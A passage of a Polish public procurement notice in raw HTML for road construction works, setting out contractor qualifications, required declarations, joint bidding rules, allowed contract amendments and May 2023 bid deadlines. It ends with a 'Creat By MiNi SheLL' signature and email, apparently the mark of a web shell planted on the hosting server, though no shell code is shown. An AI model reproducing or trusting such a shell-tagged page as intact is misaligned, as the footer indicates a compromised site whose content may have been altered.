opis warunków udziału w postępowaniu.</h3> Zamawiający wymaga, aby wykonawca prowadzący działalność gospodarczą lub<br/>zawodową był wpisany do jednego z rejestrów zawodowych lub handlowych prowadzonych w<br/>kraju, w którym ma siedzibę lub miejsce zamieszkania<br/>Wykonawca spełni warunek dotyczący zdolności technicznej lub zawodowej, jeżeli wykaże że:<br/>a) dysponuje minimum jedną osobą uprawnioną do pełnienia samodzielnych funkcji technicznych w budownictwie zgodnie w wymogami ustawy Prawo budowlane (t.j Dz.U z 2020 r., poz. 2320 oraz 2021, poz. 234) tj. legitymująca się uprawnieniami do kierowania robotami budowlanymi specjalności inżynieryjnej drogowej lub posiadającą inne uprawnienia odpowiadające powyższym, wydane na podstawie przepisów obowiązujących w czasie wydania uprawnień wraz z informacjami na temat kwalifikacji zawodowych, uprawnień i doświadczenia, a niezbędnego do wykonania przedmiotu zamówienia oraz informacją o postawie dysponowania. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie Wykonawcy,<br/>w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej<br/>samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów (t. j. Dz. U. 2020 r. poz. 1076 z późn. zm.), z innym wykonawcą, który złożył odrębną<br/>ofertę, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub<br/>informacjami potwierdzającymi przygotowanie oferty, niezależnie od Wykonawcy należącego do tej<br/>samej grupy kapitałowej, zgodnie z treścią załącznika do SWZ. 2) Odpis lub informacja z Krajowego<br/>Rejestru Sądowego lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art.<br/>109 ust. 1 pkt 4 ustawy – sporządzony nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne<br/>przepisy wymagają wpisu do rejestru lub ewidencji</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz<br/>osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego,<br/>w szczególności odpowiedzialnych za kierowanie robotami budowlanymi wraz<br/>z informacjami na temat ich kwalifikacji zawodowych, uprawnień i doświadczenia,<br/>niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do<br/>dysponowania tymi osobami zgodnie z treścią załącznika nr 6 do SWZ</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Wypełniony formularz OFERTA, zgodnie z treścią Załącznika nr 1 do SWZ;<br/>2) Dokument potwierdzający umocowanie do reprezentowania Wykonawcy, w tym<br/>pełnomocnictwo do podpisania oferty, o ile prawo do podpisania oferty nie wynika z innych<br/>dokumentów dołączonych do oferty;<br/>3) Oświadczenie o spełnianiu warunków udziału w postępowaniu, zgodnie z treścią<br/>Załącznika nr 2 do SWZ;<br/>4) Oświadczenie o braku podstaw wykluczenia, zgodnie z treścią Załącznika nr 3 do SWZ;<br/>5) Zgodnie z art.125 ust.5 ustawy Pzp Wykonawca w przypadku polegania na zdolnościach lub sytuacji podmiotów<br/>udostępniających zasoby, przedstawia wraz z w/w oświadczeniami, także oświadczenie podmiotu udostępniającego<br/>zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnienie warunków udziału w<br/>postępowaniu w zakresie w jakim Wykonawca powołuje się na jego zasoby. Stosowne oświadczenia należy złożyć na<br/>załącznikach w/w tj. zał nr 2 i 3 ze zmianami dotyczącymi podstawy tj. na podstawie art. 125 ust.5 ustawy Pzp i dopiskiem<br/>„oświadczenia podmiotu udostepniającego zasoby”.<br/>6) Zobowiązanie podmiotu trzeciego udostępniającego Wykonawcy zasoby w celu<br/>potwierdzenia przez Wykonawcę spełniania warunków udziału w postępowaniu;<br/>7) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia -<br/>oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni<br/>Wykonawcy (jeżeli dotyczy) – zgodnie z treścią Załącznika nr 7 do SWZ;<br/>8) Kosztorysy ofertowe, <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia w takim przypadku:1.Wykonawcy wspólnie ubiegający się<br/>o udzielenie zamówienia ustanawiają pełnomocnika do<br/>reprezentowania ich w postępowaniu , albo do reprezentowania i zawarcia w sprawie<br/>zamówienia publicznego. Pełnomocnictwo winno być dołączone do oferty,<br/>2.Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania<br/>składa każdy z Wykonawców wspólnie ubiegających się o zamówienie,<br/>3.Oświadczenia i dokumenty potwierdzające spełnienie warunków udziału w postępowaniu<br/>składają Wykonawcy w zakresie w jakim każdy z nich wykazuje spełnienie warunków udziału w<br/>postępowaniu,<br/>4.Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika jaki<br/>zakres usług wykonają poszczególni Wykonawcy.<br/>5.W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonują roboty<br/>budowlane lub usługi do realizacji, których te zdolności są wymagane. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Dopuszcza się następujące zmiany umowy:<br/>a)	zmiana postanowień umowy w przypadku zmiany przepisów prawnych istotnych dla realizacji przedmiotu umowy,<br/>b)	zmiana, w tym wydłużenie terminu wykonania zamówienia, zmiany ceny, zastosowanie innych rozwiązań niż to określono w dokumentacji przetargowej w związku z:<br/>	wystąpieniem okoliczności zaistniałych w trakcie realizacji zamówienia, <br/>a w szczególności zaistnieniem niesprzyjających warunków atmosferycznych, geologicznych, hydrologicznych, ornitologicznych, chiropterologicznych, zaistnieniem kolizji z sieciami infrastruktury lub wystąpieniem nieprzewidzianych prac archeologicznych, niepozwalających na wykonanie zamówienia, zgodnie z warunkami wykonania określonymi w Specyfikacjach Technicznych Wykonania i Odbioru Robót Budowlanych;<br/>	koniecznością usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej;<br/>	koniecznością wykonania robót dodatkowych niezbędnych do prawidłowego wykonania zamówienia podstawowego lub innych zamówień powiązanych, których udzielenie i wykonanie stało się konieczne lub celowe i które mają wpływ na termin realizacji niniejszego zamówienia;<br/>	ujawnieniem niezinwentaryzowanych lub o odmiennym przebiegu niezgodnym z inwentaryzacją podziemnych sieci, instalacji lub urządzeń obcych i koniecznością wykonania robót związanych z ich zabezpieczeniem lub usunięciem kolizji;<br/>	zawieszeniem robót przez Zamawiającego z przyczyn niezależnych od Wykonawcy;<br/>	działaniem siły wyższej (np. klęski żywiołowe, strajki generalne lub lokalne) mającej bezpośredni wpływ na terminowość wykonywania robót;<br/>	zaistnieniem okoliczności będących następstwem działania organów administracji lub osób indywidualnych, w szczególności w przypadku przedłużenia się procedur administracyjnych na etapie wydawania opinii, uzgodnień, zgód, postanowień i decyzji administracyjnych, jeżeli przedłużenie to nie wynikało z winy Wykonawcy;<br/>	uzasadnionej konieczności przesunięcia terminu przekazania terenu budowy;<br/>	wystąpieniem nadzwyczajnych warunków pogodowych niepozwalających na wykonanie zamówienia w terminie.<br/>c)	zmiana trybu, zasad i terminów rozliczeń wynagrodzenia umownego w przypadku zaistnienia okoliczności uzasadniających taką zmianą, w szczególności wynikających z zasad dofinansowania projektu w ramach programów zewnętrznych lub zapisów planu rzeczowo- finansowego Zamawiającego.<br/>d)	zmiana technologii wykonania danego zakresu robót określonego w dokumentacji projektowej pod warunkiem, iż nie spowoduje ona obniżenia jakości wykonania zamówienia, obniżenia trwałości jego przedmiotu i wzrostu kosztów jego późniejszego utrzymania oraz pod warunkiem wyrażenia zgody przez Zamawiającego, zmiana taka musi zostać spowodowana uzasadniającymi je okolicznościami zaistniałymi w trakcie realizacji przedmiotu umowy, w szczególności:<br/>	pojawieniem się na rynku materiałów, sprzętu lub urządzeń nowszej generacji pozwalających na zmniejszenie kosztów realizacji robót, kosztów eksploatacji in¬westycji lub umożliwiających uzyskanie lepszej jakości robót;<br/>	pojawieniem się nowszej technologii wykonania robót pozwalającej na skrócenie czasu realizacji robót, zmniejszenie kosztów realizacji robót lub kosztów eksploatacji inwestycji.<br/>2.	Niezależne od Stron zmiany dotyczące osób kluczowych dla realizacji umowy, m.in. Projektanta, Kierownika Budowy, zmiana tych osób musi być uzasadniona przez Wykonawcę i zaakceptowana przez Zamawiającego, a kwalifikacje i doświadczenie wskazanych w zastępstwie osób muszą być co najmniej takie same, jakie były określone na etapie postępowania o udzielenie zamówienia.<br/>3.	Zmiana postanowień umowy w sytuacji wystąpienia zamówień powiązanych, niezbędnych do prawidłowego wykonania zamówienia podstawowego, których wykonanie stało się konieczne lub celowe i które mają wpływ na realizację niniejszego zamówienia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-05-04 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://e-zamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-05-04 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-06-02</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com